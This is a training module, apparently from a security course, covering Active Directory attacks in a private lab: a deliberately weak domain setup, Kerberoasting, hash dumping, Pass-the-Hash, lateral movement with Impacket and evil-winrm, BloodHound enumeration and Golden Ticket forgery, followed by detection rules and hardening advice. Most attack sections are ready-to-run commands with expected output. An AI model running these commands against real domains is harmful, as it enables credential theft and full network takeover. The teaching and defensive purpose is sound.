35 KiB
35 KiB
MODULE 5: ACTIVE DIRECTORY THREAT EMULATION
Learning Objectives
By completing this module, you will:
- Understand Active Directory architecture and Kerberos authentication
- Deploy a Windows domain environment with Domain Controller and endpoints
- Execute Kerberoasting attacks to extract and crack service account credentials
- Perform Pass-the-Hash and Pass-the-Ticket credential replay attacks
- Conduct lateral movement using PsExec, WMI, and Windows Management protocols
- Enumerate AD environments using BloodHound and PowerView
- Map AD attack techniques to MITRE ATT&CK framework
- Implement detection rules for identity-based attacks
Key Concepts
Active Directory (AD)
Active Directory is Microsoft's centralized identity and access management system, used by over 90% of enterprise networks. AD provides:
- Authentication: Verifies user/computer identities via Kerberos
- Authorization: Controls access to resources (files, printers, applications)
- Directory Services: Centralized database of users, computers, groups, policies
Kerberos Authentication Protocol
User Domain Controller File Server
| | |
|---1. AS-REQ-----------> | (Request TGT) |
|<--2. AS-REP (TGT)------ | (Ticket Granting Ticket) |
| | |
|---3. TGS-REQ (TGT)----> | (Request Service Ticket) |
|<--4. TGS-REP (ST)------ | (Service Ticket) |
| | |
|---5. AP-REQ (ST)------------------------------> |
|<--6. Access Granted-------------------------------- |
Key Terms:
- TGT (Ticket Granting Ticket): Proves identity to Domain Controller
- Service Ticket (ST): Grants access to specific service (file share, SQL server)
- SPN (Service Principal Name): Identifier for services (e.g.,
HTTP/web.apophis.local) - NTLM Hash: Password representation (used for Pass-the-Hash attacks)
Why Active Directory is Critical Attack Surface
Enterprise Reality:
- 95% of Fortune 1000 companies use Active Directory
- Single compromised domain admin account = full network compromise
- Identity-based attacks bypass perimeter security (firewalls, VPNs)
- Most data breaches involve credential theft, not software exploits
Common AD Attacks:
- Kerberoasting: Extract encrypted service tickets, crack offline
- Pass-the-Hash: Use stolen NTLM hash without knowing plaintext password
- Golden Ticket: Forge TGTs to impersonate any user
- DCSync: Replicate AD database to steal all password hashes
LAB 5.1: DEPLOY ACTIVE DIRECTORY DOMAIN
Deploy Windows Server 2022 (Domain Controller)
1. CREATE VM IN PROXMOX:
- VM ID: 402
- Name: DC01-Apophis
- OS: Windows Server 2022 ISO
- CPU: 2 cores
- RAM: 4096 MB (4 GB minimum for AD)
- Disk: 60 GB
- Network: vmbr0, VLAN Tag: 400 (VICTIM_NET)
2. INSTALL WINDOWS SERVER:
- Select: Windows Server 2022 Standard (Desktop Experience)
- Custom installation: Select full disk
- Set Administrator password: P@ssw0rd! (for lab only)
3. CONFIGURE STATIC IP:
- Open: Settings > Network & Internet > Ethernet
- IP address: 10.10.4.100
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 127.0.0.1 (will point to itself after AD installation)
4. RENAME COMPUTER:
- Server Manager > Local Server > Computer Name > Change
- New name: DC01
- Restart when prompted
5. INSTALL ACTIVE DIRECTORY DOMAIN SERVICES:
- Server Manager > Manage > Add Roles and Features
- Server Roles: Check "Active Directory Domain Services"
- Click "Add Features" when prompted
- Click "Next" through wizard, then "Install"
- Wait 5-10 minutes for installation
6. PROMOTE TO DOMAIN CONTROLLER:
- Server Manager > Notification flag (yellow triangle)
- Click "Promote this server to a domain controller"
- Select: "Add a new forest"
- Root domain name: apophis.local
- Forest/Domain functional level: Windows Server 2016 (default)
- DSRM password: P@ssw0rd!
- Click "Next" through wizard
- Prerequisites Check: Click "Install"
- Server will automatically restart (takes 5-10 minutes)
7. VERIFY AD INSTALLATION:
- Login as: APOPHIS\Administrator
- Password: P@ssw0rd!
- Open: Active Directory Users and Computers (Start > search "dsa.msc")
- Expand apophis.local > See default OUs (Users, Computers, Domain Controllers)
Deploy Windows 10 (Domain Endpoint)
1. CREATE VM IN PROXMOX:
- VM ID: 403
- Name: CLIENT01-Apophis
- OS: Windows 10 Pro ISO
- CPU: 2 cores
- RAM: 4096 MB
- Disk: 40 GB
- Network: vmbr0, VLAN Tag: 400
2. INSTALL WINDOWS 10:
- Select: Windows 10 Pro
- Create local user: labuser
- Password: Welcome1
3. CONFIGURE NETWORK:
- Settings > Network & Internet > Ethernet > Change adapter options
- Right-click Ethernet > Properties > IPv4
- IP address: 10.10.4.110
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 10.10.4.100 (Domain Controller IP)
- Click OK
4. VERIFY DNS RESOLUTION:
- Open Command Prompt
- Run: nslookup apophis.local
- Should resolve to: 10.10.4.100
- If not, check DC01 DNS service is running
5. JOIN DOMAIN:
- Settings > System > About > Rename this PC (advanced)
- Click "Change"
- Member of: Domain
- Domain: apophis.local
- Click OK
- Credentials: APOPHIS\Administrator / P@ssw0rd!
- Welcome message appears: "Welcome to the apophis.local domain"
- Restart when prompted
6. LOGIN AS DOMAIN USER:
- At login screen: Other user
- Username: Administrator
- Password: P@ssw0rd!
- Domain: APOPHIS (or APOPHIS\Administrator)
- Verify: whoami → apophis\administrator
Create Vulnerable Service Account (Kerberoasting Target)
# On Domain Controller (DC01), open PowerShell as Administrator
# CREATE ORGANIZATIONAL UNIT FOR SERVICE ACCOUNTS
New-ADOrganizationalUnit -Name "Service Accounts" -Path "DC=apophis,DC=local"
# CREATE SERVICE ACCOUNT WITH WEAK PASSWORD
New-ADUser -Name "svc_sql" `
-SamAccountName "svc_sql" `
-UserPrincipalName "svc_sql@apophis.local" `
-AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) `
-Enabled $true `
-PasswordNeverExpires $true `
-Path "OU=Service Accounts,DC=apophis,DC=local"
# ASSIGN SERVICE PRINCIPAL NAME (SPN) - THIS MAKES IT KERBEROASTABLE
setspn -A MSSQLSvc/sqlserver.apophis.local:1433 apophis\svc_sql
# VERIFY SPN WAS SET
setspn -L svc_sql
# Expected output:
# Registered ServicePrincipalNames for CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local:
# MSSQLSvc/sqlserver.apophis.local:1433
# ADD TO DOMAIN ADMINS (simulate high-privilege service account)
Add-ADGroupMember -Identity "Domain Admins" -Members svc_sql
# CREATE ADDITIONAL DOMAIN USERS FOR REALISM
New-ADUser -Name "John Smith" -SamAccountName "jsmith" -AccountPassword (ConvertTo-SecureString "Welcome1" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Jane Doe" -SamAccountName "jdoe" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Bob Admin" -SamAccountName "badmin" -AccountPassword (ConvertTo-SecureString "Admin123" -AsPlainText -Force) -Enabled $true
# ADD BOB TO DOMAIN ADMINS
Add-ADGroupMember -Identity "Domain Admins" -Members badmin
# VERIFY USERS CREATED
Get-ADUser -Filter * | Select-Object Name, SamAccountName
Why This Configuration is Vulnerable:
- Weak Password: "Password123" is in common wordlists (rockyou.txt)
- SPN Assigned: Any domain user can request service ticket for this account
- Password Never Expires: No rotation policy (common in real enterprises)
- Domain Admin Membership: Cracking this account = full domain compromise
LAB 5.2: KERBEROASTING ATTACK
Understanding Kerberoasting
Attack Flow:
- Attacker compromises low-privilege domain user account
- Queries AD for all accounts with Service Principal Names (SPNs)
- Requests service tickets for those accounts from Domain Controller
- DC responds with tickets encrypted using service account's NTLM hash
- Attacker takes tickets offline and cracks with hashcat/John (no account lockout)
- If password is weak, attacker obtains plaintext credentials
Why It Works:
- Requesting service tickets is normal behavior (not suspicious)
- Encryption uses RC4/AES derived from password hash (not random key)
- Cracking happens offline at millions of guesses per second
- No failed login attempts (no account lockout)
LAB 5.2.1: Kerberoasting with Impacket (from Kali Linux)
Prerequisites:
- Compromised domain credentials (jsmith / Welcome1)
- Network access to Domain Controller (10.10.4.100)
# FROM KALI LINUX (VLAN 200 - Red Team)
# STEP 1: VERIFY CONNECTIVITY TO DOMAIN CONTROLLER
ping 10.10.4.100
# Expected: Replies from 10.10.4.100
# STEP 2: VERIFY DNS RESOLUTION (if pfSense DNS configured)
nslookup apophis.local 10.10.4.100
# Expected: Name: apophis.local, Address: 10.10.4.100
# STEP 3: ENUMERATE SPNS WITH GETUSERSPNS.PY (Impacket)
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100
# Expected Output:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ------------------------------------- ------- ------------------------------------ -------------------
# MSSQLSvc/sqlserver.apophis.local:1433 svc_sql CN=Domain Admins,CN=Users,DC=apophis 2024-01-15 10:23:45
# STEP 4: REQUEST SERVICE TICKET AND SAVE TO FILE
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100 -request -outputfile kerberoast_hashes.txt
# Expected Output:
# [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# ^ If you see this, sync time with: sudo ntpdate 10.10.4.100
# Successful output:
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL$MSSQLSvc/sqlserver.apophis.local:1433*$a1b2c3d4...
# STEP 5: VERIFY HASH FILE
cat kerberoast_hashes.txt
# Should contain Kerberos TGS-REP hash in John/Hashcat format
# STEP 6: CRACK WITH HASHCAT
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
# --force = Ignore warnings (for VM environments)
# Expected Output (after 30-60 seconds):
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL...:Password123
# STEP 7: EXTRACT CRACKED PASSWORD
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --show
# Output: ...svc_sql...:Password123
# STEP 8: VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# Expected Output:
# SMB 10.10.4.100 445 DC01 [+] apophis.local\svc_sql:Password123 (Pwn3d!)
# "Pwn3d!" = Account has administrative access to target
Alternative: Rubeus (from Windows endpoint)
# If you have foothold on CLIENT01 (Windows 10 domain-joined)
# Download Rubeus from GitHub (https://github.com/GhostPack/Rubeus)
# Transfer to CLIENT01 via SMB/HTTP
# Execute Rubeus
.\Rubeus.exe kerberoast /outfile:tickets.txt
# Expected Output:
# [*] Total kerberoastable users : 1
# [*] SamAccountName : svc_sql
# [*] DistinguishedName : CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local
# [*] ServicePrincipalName : MSSQLSvc/sqlserver.apophis.local:1433
# [*] Hash written to tickets.txt
# Transfer tickets.txt to Kali for cracking
Deliverable: Screenshot showing:
- GetUserSPNs.py enumeration output
- Hashcat cracking success with plaintext password revealed
- CrackMapExec verification showing "Pwn3d!"
LAB 5.3: PASS-THE-HASH ATTACK
Understanding Pass-the-Hash
Concept: Windows authentication can use NTLM hashes directly without needing plaintext passwords. If you steal a hash, you can authenticate as that user.
Attack Scenario:
- Attacker compromises workstation with local admin access
- Dumps LSASS memory to extract cached credentials (NTLM hashes)
- Uses hash to authenticate to other systems via SMB/WMI/RDP
- Repeats process to move laterally (spray-and-pray or targeted)
LAB 5.3.1: Dumping NTLM Hashes with Secretsdump
# FROM KALI LINUX
# STEP 1: DUMP HASHES FROM DOMAIN CONTROLLER (requires admin creds)
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output (NTLM hashes):
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
# svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
# jsmith:1105:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
# Format: username:RID:LM_hash:NTLM_hash:::
# LM hash (aad3b435...) = Empty/disabled (modern Windows)
# NTLM hash = What we need for Pass-the-Hash
# STEP 2: SAVE ADMINISTRATOR NTLM HASH
ADMIN_HASH="58a478135a93ac3bf058a5ea0e8fdb71"
# This is the NT hash for Administrator account
# STEP 3: PASS-THE-HASH TO CLIENT01 (without knowing plaintext password)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:$ADMIN_HASH Administrator@10.10.4.110
# Breakdown:
# -hashes LM:NTLM (LM is always aad3b435b51404eeaad3b435b51404ee for empty)
# Administrator = username
# @10.10.4.110 = target (CLIENT01)
# Expected Output:
# [*] Requesting shares on 10.10.4.110.....
# [*] Found writable share ADMIN$
# [*] Uploading file [random].exe
# [*] Opening SVCManager on 10.10.4.110.....
# [*] Starting service [random] on 10.10.4.110.....
# [!] Press help for extra shell commands
# C:\Windows\system32>
# STEP 4: VERIFY ACCESS
whoami
# Output: nt authority\system (SYSTEM = highest privilege)
hostname
# Output: CLIENT01
# STEP 5: DUMP LOCAL SAM DATABASE (for more credentials)
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
# Download files to Kali (or use secretsdump on localhost)
Alternative: CrackMapExec for Pass-the-Hash
# TEST HASH AGAINST MULTIPLE TARGETS (spray technique)
crackmapexec smb 10.10.4.0/24 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 --local-auth
# --local-auth = Use local accounts (not domain)
# /24 = Scan entire subnet
# Expected Output:
# SMB 10.10.4.110 445 CLIENT01 [+] CLIENT01\Administrator:58a478... (Pwn3d!)
# SMB 10.10.4.100 445 DC01 [+] APOPHIS\Administrator:58a478... (Pwn3d!)
# EXECUTE COMMANDS REMOTELY WITH PASS-THE-HASH
crackmapexec smb 10.10.4.110 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 -x "whoami"
# -x = Execute command
# Expected Output: apophis\administrator
Deliverable:
- Screenshot showing secretsdump.py output with NTLM hashes
- Screenshot showing successful psexec.py shell with "nt authority\system"
LAB 5.4: LATERAL MOVEMENT TECHNIQUES
LAB 5.4.1: PsExec (Service-Based Execution)
How PsExec Works:
- Connects to target via SMB (port 445)
- Copies executable to ADMIN$ share (C:\Windows)
- Creates and starts Windows service to run executable
- Returns output via named pipes
# PSEXEC WITH CREDENTIALS
psexec.py apophis.local/svc_sql:Password123@10.10.4.110
# PSEXEC WITH HASH
psexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.10.4.110
# PSEXEC TO DOMAIN CONTROLLER
psexec.py apophis.local/Administrator:P@ssw0rd!@10.10.4.100
# Expected Shell:
# C:\Windows\system32> whoami
# nt authority\system
Detection Artifacts:
- Service creation event (Event ID 7045)
- Network connection to ADMIN$/IPC$ shares
- Process with parent: services.exe
LAB 5.4.2: WMIExec (Fileless Execution)
Advantage over PsExec: No file written to disk (fileless), harder to detect
# WMIEXEC WITH CREDENTIALS
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110
# WMIEXEC WITH HASH
wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.10.4.110
# Expected Shell:
# C:\> whoami
# apophis\administrator
# EXECUTE SINGLE COMMAND (no interactive shell)
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110 "ipconfig"
Detection Artifacts:
- WMI process creation (Event ID 4688 with parent: WmiPrvSE.exe)
- Network: DCOM/WMI traffic (port 135 + ephemeral)
LAB 5.4.3: SMBExec (Batch File Execution)
# SMBEXEC WITH CREDENTIALS
smbexec.py apophis.local/svc_sql:Password123@10.10.4.110
# Creates batch file in ADMIN$ share, executes via service
# More stealthy than PsExec (no executable dropped)
LAB 5.4.4: Evil-WinRM (PowerShell Remoting)
Prerequisite: Target must have WinRM enabled (default on Servers, not Workstations)
# INSTALL EVIL-WINRM
sudo gem install evil-winrm
# CONNECT WITH CREDENTIALS
evil-winrm -i 10.10.4.100 -u Administrator -p 'P@ssw0rd!'
# CONNECT WITH HASH
evil-winrm -i 10.10.4.100 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71
# Expected Shell:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
apophis\administrator
# UPLOAD FILES
upload /root/tools/mimikatz.exe C:\Windows\Temp\mimikatz.exe
# DOWNLOAD FILES
download C:\Windows\System32\config\SAM /root/loot/sam
LAB 5.5: ACTIVE DIRECTORY ENUMERATION WITH BLOODHOUND
Understanding BloodHound
BloodHound visualizes Active Directory relationships to identify attack paths:
- Who has admin rights on which computers?
- Shortest path from user X to Domain Admin?
- Which accounts have SPN (Kerberoastable)?
- Trust relationships between domains?
Attack Workflow:
- Run SharpHound collector (PowerShell/C#) on domain-joined machine
- Generates JSON files with AD relationships
- Import into BloodHound GUI to visualize
- Query for attack paths (e.g., "Shortest Path to Domain Admins")
LAB 5.5.1: Install BloodHound on Kali
# STEP 1: INSTALL NEO4J (graph database)
sudo apt update
sudo apt install neo4j bloodhound -y
# STEP 2: START NEO4J DATABASE
sudo neo4j console
# Wait for "Started" message
# Access web UI: http://localhost:7474
# Default creds: neo4j / neo4j
# Change password when prompted: bloodhound123
# STEP 3: START BLOODHOUND GUI (new terminal)
bloodhound
# Login:
# Database URL: bolt://localhost:7687
# Username: neo4j
# Password: bloodhound123
LAB 5.5.2: Collect AD Data with BloodHound Python Ingestor
# FROM KALI LINUX (no need to touch Windows machines)
# INSTALL BLOODHOUND-PYTHON
pip3 install bloodhound
# RUN COLLECTOR
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All
# Parameters:
# -u = username
# -p = password
# -d = domain
# -ns = nameserver (DC IP)
# -c All = collect everything (users, groups, computers, sessions, trusts)
# Expected Output:
# INFO: Found AD domain: apophis.local
# INFO: Connecting to LDAP server: dc01.apophis.local
# INFO: Found 1 domains
# INFO: Found 1 domains in the forest
# INFO: Found 2 computers
# INFO: Found 5 users
# INFO: Found 0 trusts
# INFO: Starting computer enumeration...
# INFO: Done in 00M 12S
# OUTPUT FILES:
ls -lh *.json
# 20240115_computers.json
# 20240115_users.json
# 20240115_groups.json
# 20240115_domains.json
LAB 5.5.3: Analyze Attack Paths in BloodHound
1. IMPORT DATA INTO BLOODHOUND:
- BloodHound GUI > Upload Data (right panel)
- Select all JSON files from previous step
- Wait for import to complete (shows # of nodes processed)
2. SEARCH FOR DOMAIN ADMINS:
- Search bar > Type "Domain Admins" > Select group
- Right-click node > "Mark Group as High Value"
- Graph shows all members (Administrator, svc_sql, badmin)
3. FIND KERBEROASTABLE ACCOUNTS:
- Analysis tab > "List all Kerberoastable Accounts"
- Should show: svc_sql with SPN MSSQLSvc/sqlserver.apophis.local:1433
4. FIND SHORTEST PATH TO DOMAIN ADMINS:
- Analysis tab > "Shortest Paths to Domain Admins"
- Shows graph of attack paths from low-privilege users
- Example: jsmith → CLIENT01 (LocalAdmin) → badmin (Session) → Domain Admins
5. FIND COMPUTERS WHERE DOMAIN ADMINS ARE LOGGED IN:
- Search for specific user (e.g., "Administrator")
- Click node > "Sessions" tab
- Shows CLIENT01, DC01 (indicates where admin is logged in = PtH target)
6. CUSTOM CYPHER QUERY (advanced):
- Raw Query box (bottom):
MATCH (u:User {hasspn: true}) RETURN u
- Returns all users with SPN (Kerberoastable targets)
Key Queries to Practice:
# Find all Domain Admins
MATCH (n:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}) RETURN n
# Find computers with unconstrained delegation (privilege escalation vector)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Find users with "Password Never Expires"
MATCH (u:User {pwdneverexpires:true}) RETURN u
# Shortest path from specific user to Domain Admin
MATCH (u:User {name:"JSMITH@APOPHIS.LOCAL"}), (g:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}), p=shortestPath((u)-[*1..]->(g)) RETURN p
Deliverable:
- Screenshot showing BloodHound graph with "Shortest Path to Domain Admins"
- Screenshot showing Kerberoastable accounts query result
LAB 5.6: GOLDEN TICKET ATTACK (ADVANCED)
Understanding Golden Tickets
Golden Ticket = Forged Kerberos TGT (Ticket Granting Ticket) that grants:
- Impersonation of ANY user (including non-existent accounts)
- Access to ANY resource in the domain
- Validity for 10 years (default Kerberos ticket lifetime)
Requirements:
- KRBTGT account NTLM hash (extract from Domain Controller)
- Domain SID (Security Identifier)
Why It's Devastating:
- Bypasses password changes (uses KRBTGT hash, not user password)
- Undetectable by normal monitoring (valid Kerberos ticket)
- Persists until KRBTGT password rotated (twice for full removal)
LAB 5.6.1: Extract KRBTGT Hash
# FROM KALI LINUX (requires Domain Admin access)
# METHOD 1: SECRETSDUMP AGAINST DOMAIN CONTROLLER
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100 -just-dc-user krbtgt
# Expected Output:
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3:::
# SAVE KRBTGT HASH
KRBTGT_HASH="d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3"
# METHOD 2: GET DOMAIN SID
lookupsid.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output:
# [*] Domain SID is: S-1-5-21-1234567890-1234567890-1234567890
# SAVE DOMAIN SID (remove last part after final hyphen)
DOMAIN_SID="S-1-5-21-1234567890-1234567890-1234567890"
LAB 5.6.2: Forge Golden Ticket
# CREATE GOLDEN TICKET WITH TICKETER.PY (Impacket)
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain apophis.local fakeadmin
# Parameters:
# -nthash = KRBTGT NTLM hash
# -domain-sid = Domain SID
# -domain = Domain name
# fakeadmin = Username to impersonate (can be anything, even non-existent)
# Expected Output:
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for apophis.local/fakeadmin
# [*] Signing/Encrypting final ticket
# [*] Saving ticket in fakeadmin.ccache
# EXPORT TICKET TO ENVIRONMENT VARIABLE
export KRB5CCNAME=/root/fakeadmin.ccache
# VERIFY TICKET
klist
# Expected:
# Ticket cache: FILE:/root/fakeadmin.ccache
# Default principal: fakeadmin@APOPHIS.LOCAL
# Valid starting Expires Service principal
# 01/15/24 10:00:00 01/25/34 10:00:00 krbtgt/APOPHIS.LOCAL@APOPHIS.LOCAL
LAB 5.6.3: Use Golden Ticket for Access
# ACCESS DOMAIN CONTROLLER WITH GOLDEN TICKET
psexec.py apophis.local/fakeadmin@DC01.apophis.local -k -no-pass
# Parameters:
# -k = Use Kerberos authentication (golden ticket)
# -no-pass = Don't prompt for password
# Expected Output:
# [*] Requesting shares on DC01.apophis.local.....
# [*] Found writable share ADMIN$
# C:\Windows\system32> whoami
# apophis\fakeadmin
# LIST DOMAIN CONTROLLER C:\ DRIVE
smbclient.py -k -no-pass apophis.local/fakeadmin@DC01.apophis.local
# Expected: Access to C$ share with full admin rights
Defensive Countermeasure:
# ON DOMAIN CONTROLLER (as recovery action)
# RESET KRBTGT PASSWORD (do this TWICE, 24 hours apart)
# First reset invalidates current golden tickets
# Second reset (after replication) fully removes old hash
# Use Microsoft script: https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -WhatIf
# Review changes, then run without -WhatIf
# MONITOR FOR GOLDEN TICKET USAGE
# Event ID 4769 (Kerberos TGS request) with:
# - Ticket encryption type: 0x17 (RC4)
# - Account name: Non-existent user
# - Ticket lifetime: Unusual (>10 hours)
DEFENSIVE DETECTION & BLUE TEAM RESPONSE
Detection Rules for Kerberoasting
Event ID 4769 (Kerberos Service Ticket Request):
ANOMALOUS INDICATORS:
- Ticket encryption type: 0x17 (RC4-HMAC) instead of 0x12 (AES256)
- Ticket options: 0x40810000 (forwardable, renewable, canonicalize)
- Service name: NOT krbtgt/* (indicates service ticket, not TGT)
- Frequency: Multiple SPN requests from single source in short time
SURICATA RULE:
alert tcp any any -> any 88 (msg:"Possible Kerberoasting - Multiple TGS-REQ"; \
flow:established,to_server; content:"|a0 03 02 01 05|"; \
threshold:type threshold, track by_src, count 5, seconds 60; \
sid:5000001; rev:1;)
SECURITY ONION KQL QUERY:
event.code: 4769 AND
winlog.event_data.TicketEncryptionType: "0x17" AND
NOT winlog.event_data.ServiceName: krbtgt*
| stats count by winlog.event_data.TargetUserName, source.ip
| where count > 5
Detection Rules for Pass-the-Hash
Event ID 4624 (Logon) with Type 3 (Network Logon):
SUSPICIOUS INDICATORS:
- Logon Type: 3 (network)
- Authentication Package: NTLM (not Kerberos)
- Elevated Token: Yes
- Source IP: Not domain controller
SPLUNK QUERY:
index=windows EventCode=4624 Logon_Type=3 Authentication_Package=NTLM Elevated_Token=Yes
| where Source_Network_Address!="10.10.4.100"
| stats count by Account_Name, Source_Network_Address
SIGMA RULE:
title: Pass-the-Hash Activity Detected
status: experimental
logsource:
product: windows
service: security
detection:
selection:
EventID: 4624
LogonType: 3
AuthenticationPackageName: 'NTLM'
condition: selection
fields:
- TargetUserName
- IpAddress
falsepositives:
- Legitimate NTLM authentication (rare in modern environments)
level: high
Detection Rules for Lateral Movement
Event ID 7045 (Service Installation) - PsExec:
INDICATORS:
- Service name: Contains random characters (e.g., "PSEXESVC")
- Service file path: \\Windows\\[random].exe
- Started by: Network logon (Event 4624 Type 3 precedes)
KQL QUERY:
event.code: 7045 AND
winlog.event_data.ServiceFileName: *\\Windows\\*.exe AND
NOT winlog.event_data.ServiceName: (known_service_list)
Event ID 4688 (Process Creation) - WMI Execution:
INDICATORS:
- Parent process: C:\Windows\System32\wbem\WmiPrvSE.exe
- Child process: Suspicious (cmd.exe, powershell.exe, unusual binaries)
- Command line: Contains encoded commands or download cradles
KQL QUERY:
event.code: 4688 AND
process.parent.name: "WmiPrvSE.exe" AND
process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe")
Defensive Hardening Recommendations
# DISABLE NTLM AUTHENTICATION (force Kerberos only)
# Group Policy: Computer Configuration > Windows Settings > Security Settings
# > Local Policies > Security Options
# Network security: Restrict NTLM: Incoming NTLM traffic = Deny all accounts
# ENABLE LAPS (LOCAL ADMIN PASSWORD SOLUTION)
# Randomizes local admin passwords on each machine (prevents lateral movement)
# Download: https://www.microsoft.com/en-us/download/details.aspx?id=46899
# IMPLEMENT PROTECTED USERS GROUP
# Add high-privilege accounts to "Protected Users" group (prevents NTLM auth)
Add-ADGroupMember -Identity "Protected Users" -Members Administrator,svc_sql
# ENABLE CREDENTIAL GUARD (Windows 10/Server 2016+)
# Protects LSASS from memory dumping attacks
# Group Policy: Computer Configuration > Administrative Templates
# > System > Device Guard > Turn On Virtualization Based Security
# MONITOR PRIVILEGED GROUP CHANGES
# Alert on Event ID 4728, 4732, 4756 (user added to security-enabled group)
# IMPLEMENT TIERED ADMINISTRATION MODEL
# Tier 0: Domain Controllers, Domain Admins (separate credentials)
# Tier 1: Servers (different admin accounts)
# Tier 2: Workstations (standard users)
# Prevents compromise cascade
MITRE ATT&CK FRAMEWORK MAPPING
| Technique ID | Technique Name | Lab Coverage |
|---|---|---|
| T1558.003 | Kerberoasting | LAB 5.2 (GetUserSPNs, Hashcat) |
| T1550.002 | Pass-the-Hash | LAB 5.3 (Secretsdump, PsExec -hashes) |
| T1021.002 | SMB/Windows Admin Shares | LAB 5.4 (PsExec, SMBExec) |
| T1021.006 | Windows Remote Management | LAB 5.4 (Evil-WinRM) |
| T1047 | Windows Management Instrumentation | LAB 5.4 (WMIExec) |
| T1087.002 | Domain Account Discovery | LAB 5.5 (BloodHound enumeration) |
| T1069.002 | Domain Groups Discovery | LAB 5.5 (BloodHound group mapping) |
| T1482 | Domain Trust Discovery | LAB 5.5 (BloodHound trust analysis) |
| T1558.001 | Golden Ticket | LAB 5.6 (Ticketer.py, KRBTGT extraction) |
| T1003.001 | LSASS Memory Dump | LAB 5.3 (Secretsdump mimikatz) |
Kill Chain Phase: Lateral Movement (Stage 4), Privilege Escalation (Stage 3)
TROUBLESHOOTING GUIDE
Issue: GetUserSPNs fails with "KRB_AP_ERR_SKEW"
Root Cause: Clock skew between Kali Linux and Domain Controller (Kerberos requires <5 min difference)
Solution:
# SYNC TIME WITH DOMAIN CONTROLLER
sudo ntpdate 10.10.4.100
# Or: sudo timedatectl set-ntp true
# VERIFY TIME SYNC
date
# Compare to DC time
Issue: Secretsdump returns "STATUS_LOGON_FAILURE"
Root Cause: Incorrect credentials or account locked
Solution:
# VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# CHECK ACCOUNT STATUS ON DOMAIN CONTROLLER
Get-ADUser -Identity svc_sql | Select-Object Enabled, LockedOut, PasswordExpired
Issue: BloodHound shows no data after import
Root Cause: JSON files empty or collection failed
Solution:
# RE-RUN COLLECTION WITH VERBOSE OUTPUT
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All --zip -v
# --zip = Creates single ZIP file for easier upload
# -v = Verbose output for debugging
# VERIFY FILE SIZES
ls -lh *.json
# Should have KB-MB of data, not 0 bytes
Issue: PsExec hangs at "Requesting shares"
Root Cause: Firewall blocking SMB (port 445) or ADMIN$ share not accessible
Solution:
# TEST SMB CONNECTIVITY
smbclient -L //10.10.4.110 -U Administrator%P@ssw0rd!
# Should show ADMIN$, C$, IPC$ shares
# CHECK WINDOWS FIREWALL ON TARGET (from compromised shell)
Get-NetFirewallProfile | Select-Object Name, Enabled
# If enabled, disable for lab: Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
PROFESSOR'S GUIDANCE
Why Active Directory is the "Crown Jewel"
Statistics from Real Breaches:
- 82% of data breaches involve stolen credentials (Verizon DBIR 2023)
- Average time to crack Kerberoasted password: 6 hours (weak), 2 days (medium)
- 95% of organizations have at least one SPN with weak password
- 80% of organizations never rotate KRBTGT password (golden tickets persist indefinitely)
Real-World Attacker Workflow:
- Phishing email → User clicks → Download payload
- Payload beacons to C2 server → Attacker gains foothold
- Run Mimikatz/SharpHound → Extract credentials, map domain
- Kerberoast service accounts → Crack offline → Obtain Domain Admin
- Lateral movement → Access file servers, databases → Exfiltrate data
